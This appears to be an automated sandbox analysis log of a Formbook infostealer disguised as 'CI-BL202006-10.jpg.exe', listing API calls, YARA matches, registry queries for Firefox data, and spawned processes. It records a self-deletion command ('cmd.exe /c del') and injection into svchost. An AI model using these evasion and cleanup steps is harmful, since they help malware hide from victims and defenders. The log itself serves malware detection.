Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45A800 NtSetValueKey, 7_2_1F45A800
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F45B0B0 NtGetContextThread, 7_2_1F45B0B0
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_00561477 NtProtectVirtualMemory, 7_2_00561477
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_00561400 Sleep,NtProtectVirtualMemory, 7_2_00561400
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_00560D67 CreateThread,TerminateThread,NtProtectVirtualMemory, 7_2_00560D67
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_00560DC0 RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,NtProtectVirtualMemory, 7_2_00560DC0
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_00562DF6 NtSetInformationThread, 7_2_00562DF6
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_00562A49 NtProtectVirtualMemory, 7_2_00562A49
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_00561470 NtProtectVirtualMemory, 7_2_00561470
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_00562DFC NtSetInformationThread, 7_2_00562DFC
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_005601E6 LdrInitializeThunk,NtSetInformationThread, 7_2_005601E6
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A310 NtEnumerateValueKey,LdrInitializeThunk,9_2_0306A310
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A350 NtQueryValueKey,LdrInitializeThunk,9_2_0306A350
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A360 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_0306A360
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A3D0 NtCreateKey,LdrInitializeThunk,9_2_0306A3D0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A3E0 NtFreeVirtualMemory,LdrInitializeThunk,9_2_0306A3E0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A240 NtReadFile,LdrInitializeThunk,9_2_0306A240
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A2D0 NtClose,LdrInitializeThunk,9_2_0306A2D0
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306A800 NtSetValueKey,LdrInitializeThunk,9_2_0306A800
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306A750 NtCreateFile,LdrInitializeThunk,9_2_0306A750
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306A610 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_0306A610
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306A6A0 NtCreateSection,LdrInitializeThunk,9_2_0306A6A0
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306A540 NtDelayExecution,LdrInitializeThunk,9_2_0306A540
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306A560 NtQuerySystemInformation,LdrInitializeThunk,9_2_0306A560
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306A410 NtQueryInformationToken,LdrInitializeThunk,9_2_0306A410
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306A480 NtMapViewOfSection,LdrInitializeThunk,9_2_0306A480
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306ACE0 NtCreateMutant,LdrInitializeThunk,9_2_0306ACE0
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306A370 NtQueryInformationProcess,9_2_0306A370
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306A220 NtWaitForSingleObject,9_2_0306A220
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306BA30 NtSetContextThread,9_2_0306BA30
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306A260 NtWriteFile,9_2_0306A260
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306A2F0 NtQueryInformationFile,9_2_0306A2F0
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306B0B0 NtGetContextThread,9_2_0306B0B0
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306A700 NtProtectVirtualMemory,9_2_0306A700
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306A710 NtQuerySection,9_2_0306A710
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306A720 NtResumeThread,9_2_0306A720
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306A780 NtOpenDirectoryObject,9_2_0306A780
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306A650 NtQueueApcThread,9_2_0306A650
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306A6D0 NtCreateProcessEx,9_2_0306A6D0
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306A520 NtEnumerateKey,9_2_0306A520
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306BD40 NtSuspendThread,9_2_0306BD40
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306A5A0 NtWriteVirtualMemory,9_2_0306A5A0
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306A5F0 NtReadVirtualMemory,9_2_0306A5F0
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306B410 NtOpenProcessToken,9_2_0306B410
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306A430 NtQueryVirtualMemory,9_2_0306A430
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306A460 NtOpenProcess,9_2_0306A460
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306A470 NtSetInformationFile,9_2_0306A470
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306B470 NtOpenThread,9_2_0306B470
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0306A4A0 NtUnmapViewOfSection,9_2_0306A4A0
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_02817870 NtAllocateVirtualMemory,9_2_02817870
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_02817690 NtCreateFile,9_2_02817690
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_028177C0 NtClose,9_2_028177C0
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_02817740 NtReadFile,9_2_02817740
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0281773A NtReadFile,9_2_0281773A
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 0_2_001C164A 0_2_001C164A
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4E1746 7_2_1F4E1746
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4E1FCE 7_2_1F4E1FCE
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4D2782 7_2_1F4D2782
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F435790 7_2_1F435790
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F437640 7_2_1F437640
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F444E61 7_2_1F444E61
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4DCE66 7_2_1F4DCE66
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F445E70 7_2_1F445E70
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F446611 7_2_1F446611
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4E26F8 7_2_1F4E26F8
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4D3E96 7_2_1F4D3E96
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F410D40 7_2_1F410D40
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4D1D1B 7_2_1F4D1D1B
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4E2519 7_2_1F4E2519
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F431530 7_2_1F431530
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4BC53F 7_2_1F4BC53F
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4CFDDB 7_2_1F4CFDDB
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4DD5D2 7_2_1F4DD5D2
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4C1DE3 7_2_1F4C1DE3
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4BE58A 7_2_1F4BE58A
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4DE581 7_2_1F4DE581
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F44547E 7_2_1F44547E
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F42740C 7_2_1F42740C
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F431410 7_2_1F431410
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4CF42B 7_2_1F4CF42B
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4DDCC5 7_2_1F4DDCC5
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4D44EF 7_2_1F4D44EF
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4E1C9F 7_2_1F4E1C9F
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4E2C9A 7_2_1F4E2C9A
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4D3490 7_2_1F4D3490
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F43FB40 7_2_1F43FB40
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4463C2 7_2_1F4463C2
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F41EBE0 7_2_1F41EBE0
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F444B96 7_2_1F444B96
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F444A5B 7_2_1F444A5B
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4D0A02 7_2_1F4D0A02
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4EE214 7_2_1F4EE214
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F44523D 7_2_1F44523D
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4E22DD 7_2_1F4E22DD
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4E1A99 7_2_1F4E1A99
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4342B0 7_2_1F4342B0
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F44594B 7_2_1F44594B
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F469906 7_2_1F469906
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F447110 7_2_1F447110
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4D61DF 7_2_1F4D61DF
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4E19E2 7_2_1F4E19E2
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F446180 7_2_1F446180
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4ED9BE 7_2_1F4ED9BE
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F441070 7_2_1F441070
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F449810 7_2_1F449810
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4DD016 7_2_1F4DD016
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F44E020 7_2_1F44E020
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F440021 7_2_1F440021
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4448CB 7_2_1F4448CB
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4E28E8 7_2_1F4E28E8
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F42A080 7_2_1F42A080
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F4C18B6 7_2_1F4C18B6
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_0009A9EA 7_2_0009A9EA
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_00088B3B 7_2_00088B3B
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_00088B40 7_2_00088B40
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_00082D90 7_2_00082D90
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_0009B5BB 7_2_0009B5BB
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_0009A666 7_2_0009A666
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_0009B6CE 7_2_0009B6CE
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_00082FB0 7_2_00082FB0
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0304FB40 9_2_0304FB40
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03054B96 9_2_03054B96
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030563C2 9_2_030563C2
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0302EBE0 9_2_0302EBE0
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030E0A02 9_2_030E0A02
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030FE214 9_2_030FE214
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0305523D 9_2_0305523D
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03054A5B 9_2_03054A5B
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030F1A99 9_2_030F1A99
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030442B0 9_2_030442B0
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030F22DD 9_2_030F22DD
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03079906 9_2_03079906
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03057110 9_2_03057110
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0305594B 9_2_0305594B
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03056180 9_2_03056180
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030FD9BE 9_2_030FD9BE
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030E61DF 9_2_030E61DF
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030F19E2 9_2_030F19E2
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03059810 9_2_03059810
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030ED016 9_2_030ED016
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03050021 9_2_03050021
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0305E020 9_2_0305E020
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03051070 9_2_03051070
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0303A080 9_2_0303A080
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030D18B6 9_2_030D18B6
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030548CB 9_2_030548CB
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030F28E8 9_2_030F28E8
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030F1746 9_2_030F1746
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030E2782 9_2_030E2782
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03045790 9_2_03045790
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030F1FCE 9_2_030F1FCE
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03056611 9_2_03056611
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03047640 9_2_03047640
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03054E61 9_2_03054E61
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030ECE66 9_2_030ECE66
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03055E70 9_2_03055E70
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030E3E96 9_2_030E3E96
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030F26F8 9_2_030F26F8
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030E1D1B 9_2_030E1D1B
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030F2519 9_2_030F2519
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030CC53F 9_2_030CC53F
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03041530 9_2_03041530
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03020D40 9_2_03020D40
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030CE58A 9_2_030CE58A
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030EE581 9_2_030EE581
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030DFDDB 9_2_030DFDDB
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030ED5D2 9_2_030ED5D2
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030D1DE3 9_2_030D1DE3
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0303740C 9_2_0303740C
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03041410 9_2_03041410
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030DF42B 9_2_030DF42B
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0305547E 9_2_0305547E
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030F1C9F 9_2_030F1C9F
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030F2C9A 9_2_030F2C9A
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030E3490 9_2_030E3490
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030EDCC5 9_2_030EDCC5
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_030E44EF 9_2_030E44EF
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_02808B3B 9_2_02808B3B
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_02808B40 9_2_02808B40
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0281A9EA 9_2_0281A9EA
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0281B6CE 9_2_0281B6CE
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0281A666 9_2_0281A666
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_02802FB0 9_2_02802FB0
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_02802D90 9_2_02802D90
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0281B5BB 9_2_0281B5BB
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: String function: 1F41B0E0 appears 176 times
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: String function: 1F4A5110 appears 38 times
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: String function: 1F46DDE8 appears 44 times
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0302B0E0 appears 176 times
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 030B5110 appears 38 times
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0307DDE8 appears 44 times
      Source: CI-BL202006-10.jpg.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: CI-BL202006-10.jpg.exe, 00000000.00000002.934384210.00000000021E0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs CI-BL202006-10.jpg.exe
      Source: CI-BL202006-10.jpg.exe, 00000000.00000002.934523048.0000000002250000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameKLOROFYLECTO.exeFE2X vs CI-BL202006-10.jpg.exe
      Source: CI-BL202006-10.jpg.exe, 00000000.00000002.933128546.000000000040E000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameKLOROFYLECTO.exe vs CI-BL202006-10.jpg.exe
      Source: CI-BL202006-10.jpg.exe | Binary or memory string: OriginalFilename vs CI-BL202006-10.jpg.exe
      Source: CI-BL202006-10.jpg.exe, 00000007.00000003.1014584683.0000000000936000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamesvchost.exej% vs CI-BL202006-10.jpg.exe
      Source: CI-BL202006-10.jpg.exe, 00000007.00000002.1020554597.000000001F69F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs CI-BL202006-10.jpg.exe
      Source: CI-BL202006-10.jpg.exe, 00000007.00000002.1018497842.000000001ECD0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemswsock.dll.muij% vs CI-BL202006-10.jpg.exe
      Source: CI-BL202006-10.jpg.exe, 00000007.00000000.928398840.000000000040E000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameKLOROFYLECTO.exe vs CI-BL202006-10.jpg.exe
      Source: CI-BL202006-10.jpg.exe, 00000007.00000002.1018535878.000000001EE20000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs CI-BL202006-10.jpg.exe
      Source: CI-BL202006-10.jpg.exe | Binary or memory string: OriginalFilenameKLOROFYLECTO.exe vs CI-BL202006-10.jpg.exe
      Source: C:\Windows\SysWOW64\svchost.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory
      Source: 00000009.00000002.1181326536.0000000003537000.00000004.00000001.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000007.00000002.1018825557.000000001F1C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000007.00000002.1018825557.000000001F1C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000007.00000002.1015418131.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000007.00000002.1015418131.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000009.00000002.1178893950.0000000002800000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000002.1178893950.0000000002800000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000009.00000002.1177510559.0000000000130000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000002.1177510559.0000000000130000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@10/1@8/2
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4736:120:WilError_01
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:64:120:WilError_01
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | File created: C:\Users\user\AppData\Local\Temp\~DFB4CF2D25706A5AA6.TMP
      Source: CI-BL202006-10.jpg.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Windows\explorer.exe | File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\SysWOW64\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: CI-BL202006-10.jpg.exe | Virustotal: Detection: 29%
      Source: CI-BL202006-10.jpg.exe | ReversingLabs: Detection: 20%
      Source: unknown | Process created: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe 'C:\Users\user\Desktop\CI-BL202006-10.jpg.exe'
      Source: unknown | Process created: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe 'C:\Users\user\Desktop\CI-BL202006-10.jpg.exe'
      Source: unknown | Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
      Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\CI-BL202006-10.jpg.exe'
